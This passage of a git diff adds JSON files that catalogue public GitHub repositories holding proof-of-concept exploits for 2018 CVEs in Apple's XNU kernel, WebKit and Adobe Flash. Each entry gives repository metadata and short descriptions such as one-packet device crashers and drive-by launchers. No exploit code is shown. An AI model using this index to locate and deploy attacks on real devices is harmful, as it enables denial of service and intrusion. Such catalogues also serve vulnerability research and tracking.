"description": "Crash macOS and iOS devices with one packet", + "fork": false, + "created_at": "2018-11-01T17:03:25Z", + "updated_at": "2024-08-12T19:42:55Z", + "pushed_at": "2018-11-15T21:13:37Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 48, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 155810193, + "name": "check_icmp_dos-CVE-2018-4407-", + "full_name": "s2339956\/check_icmp_dos-CVE-2018-4407-", + "owner": { + "login": "s2339956", + "id": 17181670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17181670?v=4", + "html_url": "https:\/\/github.com\/s2339956", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s2339956\/check_icmp_dos-CVE-2018-4407-", + "description": "CVE-2018-4407 概述與實現", + "fork": false, + "created_at": "2018-11-02T03:38:41Z", + "updated_at": "2018-11-02T03:48:36Z", + "pushed_at": "2018-11-02T03:48:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 155836421, + "name": "AppleDOS", + "full_name": "farisv\/AppleDOS", + "owner": { + "login": "farisv", + "id": 44131180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44131180?v=4", + "html_url": "https:\/\/github.com\/farisv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farisv\/AppleDOS", + "description": "Messing Apple devices on the network with CVE-2018-4407 (heap overflow in bad packet handling)", + "fork": false, + "created_at": "2018-11-02T08:29:29Z", + "updated_at": "2024-08-28T17:33:37Z", + "pushed_at": "2018-12-04T08:21:43Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "dos-attack", + "exploit" + ], + "visibility": "public", + "forks": 6, + "watchers": 26, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 155837722, + "name": "CVE-2018-4407", + "full_name": "WyAtu\/CVE-2018-4407", + "owner": { + "login": "WyAtu", + "id": 23521935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23521935?v=4", + "html_url": "https:\/\/github.com\/WyAtu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WyAtu\/CVE-2018-4407", + "description": "CVE-2018-4407 IOS\/macOS kernel crash", + "fork": false, + "created_at": "2018-11-02T08:40:33Z", + "updated_at": "2024-08-12T19:42:56Z", + "pushed_at": "2019-02-23T07:41:06Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 155885238, + "name": "CVE-2018-4407-IOS", + "full_name": "zteeed\/CVE-2018-4407-IOS", + "owner": { + "login": "zteeed", + "id": 34286541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34286541?v=4", + "html_url": "https:\/\/github.com\/zteeed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zteeed\/CVE-2018-4407-IOS", + "description": "POC: Heap buffer overflow in the networking code in the XNU operating system kernel", + "fork": false, + "created_at": "2018-11-02T15:26:47Z", + "updated_at": "2024-08-15T09:53:24Z", + "pushed_at": "2024-02-25T17:33:27Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-4407", + "exploit", + "python-nmap", + "python-scapy" + ], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 155925880, + "name": "node-cve-2018-4407", + "full_name": "SamDecrock\/node-cve-2018-4407", + "owner": { + "login": "SamDecrock", + "id": 550487, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/550487?v=4", + "html_url": "https:\/\/github.com\/SamDecrock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamDecrock\/node-cve-2018-4407", + "description": "Node.js PoC exploit code for CVE-2018-4407", + "fork": false, + "created_at": "2018-11-02T22:00:17Z", + "updated_at": "2024-08-12T19:42:57Z", + "pushed_at": "2018-11-02T22:13:40Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 156039963, + "name": "CVE-2018-4407", + "full_name": "r3dxpl0it\/CVE-2018-4407", + "owner": { + "login": "r3dxpl0it", + "id": 43002597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43002597?v=4", + "html_url": "https:\/\/github.com\/r3dxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dxpl0it\/CVE-2018-4407", + "description": "IOS\/MAC Denial-Of-Service [POC\/EXPLOIT FOR MASSIVE ATTACK TO IOS\/MAC IN NETWORK]", + "fork": false, + "created_at": "2018-11-04T01:47:05Z", + "updated_at": "2024-11-08T19:00:49Z", + "pushed_at": "2018-11-04T02:25:08Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "blueteam", + "cve", + "cyber-security", + "cybersecurity", + "denial-of-service", + "exploit", + "hacking", + "hacking-tool", + "ios", + "macos", + "network", + "penetration-testing", + "poc", + "redteam", + "security" + ], + "visibility": "public", + "forks": 9, + "watchers": 35, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 156051346, + "name": "CVE-2018-4407", + "full_name": "lucagiovagnoli\/CVE-2018-4407", + "owner": { + "login": "lucagiovagnoli", + "id": 4341034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4341034?v=4", + "html_url": "https:\/\/github.com\/lucagiovagnoli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucagiovagnoli\/CVE-2018-4407", + "description": "A buffer overflow vulnerability in the XNU kernel's ICMP error code causes IOS devices to crash (laptops and mobiles).", + "fork": false, + "created_at": "2018-11-04T05:10:38Z", + "updated_at": "2019-12-06T13:15:13Z", + "pushed_at": "2018-11-04T19:00:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 156611823, + "name": "Apple-Remote-Crash-Tool-CVE-2018-4407", + "full_name": "anonymouz4\/Apple-Remote-Crash-Tool-CVE-2018-4407", + "owner": { + "login": "anonymouz4", + "id": 32394757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32394757?v=4", + "html_url": "https:\/\/github.com\/anonymouz4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anonymouz4\/Apple-Remote-Crash-Tool-CVE-2018-4407", + "description": "Crashes any macOS High Sierra or iOS 11 device that is on the same WiFi network", + "fork": false, + "created_at": "2018-11-07T21:41:39Z", + "updated_at": "2023-07-07T19:08:12Z", + "pushed_at": "2019-01-17T18:55:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "highsierra", + "ios", + "ios11", + "macos", + "swift" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 159180451, + "name": "wifi", + "full_name": "soccercab\/wifi", + "owner": { + "login": "soccercab", + "id": 26183552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26183552?v=4", + "html_url": "https:\/\/github.com\/soccercab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soccercab\/wifi", + "description": "iOS 11 WiFi Exploit - icmp_error_CVE-2018-4407", + "fork": false, + "created_at": "2018-11-26T14:14:55Z", + "updated_at": "2024-03-20T16:14:33Z", + "pushed_at": "2018-11-26T20:38:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 163652093, + "name": "CVE-2018-4407-iOS-exploit", + "full_name": "zeng9t\/CVE-2018-4407-iOS-exploit", + "owner": { + "login": "zeng9t", + "id": 10195620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10195620?v=4", + "html_url": "https:\/\/github.com\/zeng9t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeng9t\/CVE-2018-4407-iOS-exploit", + "description": "CVE-2018-4407,iOS exploit", + "fork": false, + "created_at": "2018-12-31T08:24:06Z", + "updated_at": "2023-04-06T06:17:42Z", + "pushed_at": "2018-12-31T08:48:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 183878561, + "name": "CVE-2018-4407", + "full_name": "5431\/CVE-2018-4407", + "owner": { + "login": "5431", + "id": 28725174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28725174?v=4", + "html_url": "https:\/\/github.com\/5431", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5431\/CVE-2018-4407", + "description": "ios 缓冲区溢出exp", + "fork": false, + "created_at": "2019-04-28T08:19:48Z", + "updated_at": "2019-04-28T08:21:21Z", + "pushed_at": "2019-04-28T08:21:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 221190337, + "name": "iOS-Kernel-Crash", + "full_name": "pwnhacker0x18\/iOS-Kernel-Crash", + "owner": { + "login": "pwnhacker0x18", + "id": 51971493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51971493?v=4", + "html_url": "https:\/\/github.com\/pwnhacker0x18", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnhacker0x18\/iOS-Kernel-Crash", + "description": "Exploit for CVE-2018-4407-Memory Corruption", + "fork": false, + "created_at": "2019-11-12T10:24:34Z", + "updated_at": "2024-08-12T19:54:46Z", + "pushed_at": "2020-04-01T14:24:27Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 289937615, + "name": "CVE-2018-4407", + "full_name": "Fans0n-Fan\/CVE-2018-4407", + "owner": { + "login": "Fans0n-Fan", + "id": 62650136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62650136?v=4", + "html_url": "https:\/\/github.com\/Fans0n-Fan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fans0n-Fan\/CVE-2018-4407", + "description": "Kernel crash caused by out-of-bounds write in Apple's ICMP packet-handling code (CVE-2018-4407)", + "fork": false, + "created_at": "2020-08-24T13:35:28Z", + "updated_at": "2020-08-24T13:37:12Z", + "pushed_at": "2020-08-24T13:37:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 784916149, + "name": "CVE-2018-4407", + "full_name": "szabo-tibor\/CVE-2018-4407", + "owner": { + "login": "szabo-tibor", + "id": 69170493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69170493?v=4", + "html_url": "https:\/\/github.com\/szabo-tibor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szabo-tibor\/CVE-2018-4407", + "description": "Exploit code for CVE-2018-4407", + "fork": false, + "created_at": "2024-04-10T20:20:13Z", + "updated_at": "2024-04-10T20:20:47Z", + "pushed_at": "2024-04-10T20:21:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4411.json b/2018/CVE-2018-4411.json new file mode 100644 index 0000000000..43029d0dd7 --- /dev/null +++ b/2018/CVE-2018-4411.json @@ -0,0 +1,33 @@ +[ + { + "id": 180542343, + "name": "POC-CVE-2018-4411", + "full_name": "lilang-wu\/POC-CVE-2018-4411", + "owner": { + "login": "lilang-wu", + "id": 16700065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16700065?v=4", + "html_url": "https:\/\/github.com\/lilang-wu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lilang-wu\/POC-CVE-2018-4411", + "description": null, + "fork": false, + "created_at": "2019-04-10T08:55:55Z", + "updated_at": "2019-04-10T08:58:17Z", + "pushed_at": "2019-04-10T08:58:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4415.json b/2018/CVE-2018-4415.json new file mode 100644 index 0000000000..3b15fe9bb1 --- /dev/null +++ b/2018/CVE-2018-4415.json @@ -0,0 +1,33 @@ +[ + { + "id": 159675683, + "name": "CVE-2018-4415", + "full_name": "T1V0h\/CVE-2018-4415", + "owner": { + "login": "T1V0h", + "id": 27940897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27940897?v=4", + "html_url": "https:\/\/github.com\/T1V0h", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T1V0h\/CVE-2018-4415", + "description": null, + "fork": false, + "created_at": "2018-11-29T14:06:50Z", + "updated_at": "2018-11-29T14:12:49Z", + "pushed_at": "2018-11-29T14:09:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4416.json b/2018/CVE-2018-4416.json new file mode 100644 index 0000000000..dc0d88e722 --- /dev/null +++ b/2018/CVE-2018-4416.json @@ -0,0 +1,33 @@ +[ + { + "id": 675512492, + "name": "CVE-2018-4416-exploit", + "full_name": "erupmi\/CVE-2018-4416-exploit", + "owner": { + "login": "erupmi", + "id": 112787364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112787364?v=4", + "html_url": "https:\/\/github.com\/erupmi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erupmi\/CVE-2018-4416-exploit", + "description": "CVE exploitation for WebKit jsc CVE-2018-4416", + "fork": false, + "created_at": "2023-08-07T05:13:34Z", + "updated_at": "2024-11-26T08:46:23Z", + "pushed_at": "2024-04-19T06:40:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4431.json b/2018/CVE-2018-4431.json new file mode 100644 index 0000000000..bcb680050e --- /dev/null +++ b/2018/CVE-2018-4431.json @@ -0,0 +1,33 @@ +[ + { + "id": 163434196, + "name": "PoC_iOS12", + "full_name": "ktiOSz\/PoC_iOS12", + "owner": { + "login": "ktiOSz", + "id": 37155945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37155945?v=4", + "html_url": "https:\/\/github.com\/ktiOSz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ktiOSz\/PoC_iOS12", + "description": "PoC Exploit iOS 12 to iOS 12.1 (CVE-2018-4431)", + "fork": false, + "created_at": "2018-12-28T17:26:35Z", + "updated_at": "2024-08-15T09:59:01Z", + "pushed_at": "2018-12-28T17:31:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4441.json b/2018/CVE-2018-4441.json new file mode 100644 index 0000000000..2d0909c1d3 --- /dev/null +++ b/2018/CVE-2018-4441.json @@ -0,0 +1,37 @@ +[ + { + "id": 174585423, + "name": "PS4-6.20-WebKit-Code-Execution-Exploit", + "full_name": "Cryptogenic\/PS4-6.20-WebKit-Code-Execution-Exploit", + "owner": { + "login": "Cryptogenic", + "id": 9409828, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9409828?v=4", + "html_url": "https:\/\/github.com\/Cryptogenic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cryptogenic\/PS4-6.20-WebKit-Code-Execution-Exploit", + "description": "A WebKit exploit using CVE-2018-4441 to obtain RCE on PS4 6.20.", + "fork": false, + "created_at": "2019-03-08T18:06:10Z", + "updated_at": "2024-10-23T13:55:03Z", + "pushed_at": "2019-03-08T18:42:56Z", + "stargazers_count": 201, + "watchers_count": 201, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploitation", + "javascript", + "webkit" + ], + "visibility": "public", + "forks": 52, + "watchers": 201, + "score": 0, + "subscribers_count": 32 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4878.json b/2018/CVE-2018-4878.json new file mode 100644 index 0000000000..134e58243b --- /dev/null +++ b/2018/CVE-2018-4878.json @@ -0,0 +1,345 @@ +[ + { + "id": 118241221, + "name": "CVE-2018-4878-", + "full_name": "ydl555\/CVE-2018-4878-", + "owner": { + "login": "ydl555", + "id": 12909271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12909271?v=4", + "html_url": "https:\/\/github.com\/ydl555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ydl555\/CVE-2018-4878-", + "description": "备忘:flash挂马工具备份 CVE-2018-4878", + "fork": false, + "created_at": "2018-01-20T12:32:26Z", + "updated_at": "2018-06-14T13:18:54Z", + "pushed_at": "2018-06-12T03:04:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "flash" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 120909146, + "name": "CVE-2018-4878", + "full_name": "mdsecactivebreach\/CVE-2018-4878", + "owner": { + "login": "mdsecactivebreach", + "id": 29373540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29373540?v=4", + "html_url": "https:\/\/github.com\/mdsecactivebreach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mdsecactivebreach\/CVE-2018-4878", + "description": null, + "fork": false, + "created_at": "2018-02-09T13:30:46Z", + "updated_at": "2024-08-12T19:36:09Z", + "pushed_at": "2018-02-09T14:38:27Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 22, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 120962228, + "name": "CVE-2018-4878", + "full_name": "hybridious\/CVE-2018-4878", + "owner": { + "login": "hybridious", + "id": 26754785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26754785?v=4", + "html_url": "https:\/\/github.com\/hybridious", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hybridious\/CVE-2018-4878", + "description": "Aggressor Script to just launch IE driveby for CVE-2018-4878", + "fork": false, + "created_at": "2018-02-09T22:25:03Z", + "updated_at": "2022-01-17T03:52:29Z", + "pushed_at": "2018-02-09T22:09:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 121002284, + "name": "CVE-2018-4878", + "full_name": "vysecurity\/CVE-2018-4878", + "owner": { + "login": "vysecurity", + "id": 3596242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3596242?v=4", + "html_url": "https:\/\/github.com\/vysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vysecurity\/CVE-2018-4878", + "description": "Aggressor Script to launch IE driveby for CVE-2018-4878", + "fork": false, + "created_at": "2018-02-10T09:30:18Z", + "updated_at": "2024-08-12T19:36:10Z", + "pushed_at": "2018-02-10T19:39:10Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 87, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 122663508, + "name": "CVE-2018-4878", + "full_name": "KathodeN\/CVE-2018-4878", + "owner": { + "login": "KathodeN", + "id": 29355827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29355827?v=4", + "html_url": "https:\/\/github.com\/KathodeN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KathodeN\/CVE-2018-4878", + "description": "CVE-2018-4878 样本", + "fork": false, + "created_at": "2018-02-23T19:24:40Z", + "updated_at": "2024-08-12T19:36:28Z", + "pushed_at": "2018-02-22T07:10:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 128007297, + "name": "CVE-2018-4878", + "full_name": "SyFi\/CVE-2018-4878", + "owner": { + "login": "SyFi", + "id": 26314806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26314806?v=4", + "html_url": "https:\/\/github.com\/SyFi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SyFi\/CVE-2018-4878", + "description": "Flash Exploit Poc", + "fork": false, + "created_at": "2018-04-04T04:33:44Z", + "updated_at": "2024-08-12T19:37:29Z", + "pushed_at": "2018-09-03T11:41:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 137009230, + "name": "CVE-2018-4878", + "full_name": "ydl555\/CVE-2018-4878", + "owner": { + "login": "ydl555", + "id": 12909271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12909271?v=4", + "html_url": "https:\/\/github.com\/ydl555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ydl555\/CVE-2018-4878", + "description": " CVE-2018-4878 flash 0day", + "fork": false, + "created_at": "2018-06-12T02:57:59Z", + "updated_at": "2018-06-12T03:01:52Z", + "pushed_at": "2018-06-12T02:57:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 153381902, + "name": "CVE-2018-4878", + "full_name": "B0fH\/CVE-2018-4878", + "owner": { + "login": "B0fH", + "id": 1335037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1335037?v=4", + "html_url": "https:\/\/github.com\/B0fH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B0fH\/CVE-2018-4878", + "description": "Metasploit module for CVE-2018-4878", + "fork": false, + "created_at": "2018-10-17T02:11:24Z", + "updated_at": "2022-04-12T03:34:59Z", + "pushed_at": "2018-10-24T02:18:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 162440583, + "name": "CVE-2018-4878", + "full_name": "Yable\/CVE-2018-4878", + "owner": { + "login": "Yable", + "id": 33931550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33931550?v=4", + "html_url": "https:\/\/github.com\/Yable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yable\/CVE-2018-4878", + "description": null, + "fork": false, + "created_at": "2018-12-19T13:22:03Z", + "updated_at": "2018-12-20T08:11:04Z", + "pushed_at": "2018-12-20T08:11:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 197427494, + "name": "SoftwareSystemSecurity-2019", + "full_name": "HuanWoWeiLan\/SoftwareSystemSecurity-2019", + "owner": { + "login": "HuanWoWeiLan", + "id": 26461476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26461476?v=4", + "html_url": "https:\/\/github.com\/HuanWoWeiLan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuanWoWeiLan\/SoftwareSystemSecurity-2019", + "description": "软件系统安全结课作业:[漏洞复现] CVE-2018-4878 Flash 0day", + "fork": false, + "created_at": "2019-07-17T16:41:09Z", + "updated_at": "2024-09-27T08:38:38Z", + "pushed_at": "2019-07-17T16:44:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 363255028, + "name": "CVE-2018-4878", + "full_name": "lvyoshino\/CVE-2018-4878", + "owner": { + "login": "lvyoshino", + "id": 45072431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45072431?v=4", + "html_url": "https:\/\/github.com\/lvyoshino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lvyoshino\/CVE-2018-4878", + "description": null, + "fork": false, + "created_at": "2021-04-30T20:45:39Z", + "updated_at": "2021-04-30T20:52:09Z", + "pushed_at": "2021-04-30T20:52:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4879.json b/2018/CVE-2018-4879.json new file mode 100644 index 0000000000..f1d981eb7e --- /dev/null +++ b/2018/CVE-2018-4879.json @@ -0,0 +1,33 @@ +[ + { + "id": 125461828, + "name": "CVE-2018-4879", + "full_name": "H3llozy\/CVE-2018-4879", + "owner": { + "login": "H3llozy", + "id": 15612861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15612861?v=4", + "html_url": "https:\/\/github.com\/H3llozy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H3llozy\/CVE-2018-4879", + "description": null, + "fork": false, + "created_at": "2018-03-16T04:04:55Z", + "updated_at": "2021-01-13T15:13:50Z", + "pushed_at": "2018-03-15T16:02:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-4901.json b/2018/CVE-2018-4901.json new file mode 100644 index 0000000000..36fff4bb5e --- /dev/null +++ b/2018/CVE-2018-4901.json @@ -0,0 +1,33 @@ +[ + { + "id": 125818046, + "name": "CVE-2018-4901", + "full_name": "bigric3\/CVE-2018-4901", + "owner": { + "login": "bigric3", + "id": 22165361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22165361?v=4", + "html_url": "https:\/\/github.com\/bigric3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigric3\/CVE-2018-4901", + "description": "crash poc & Leak info PoC", + "fork": false, + "created_at": "2018-03-19T07:27:53Z", + "updated_at": "2018-11-16T12:24:04Z", + 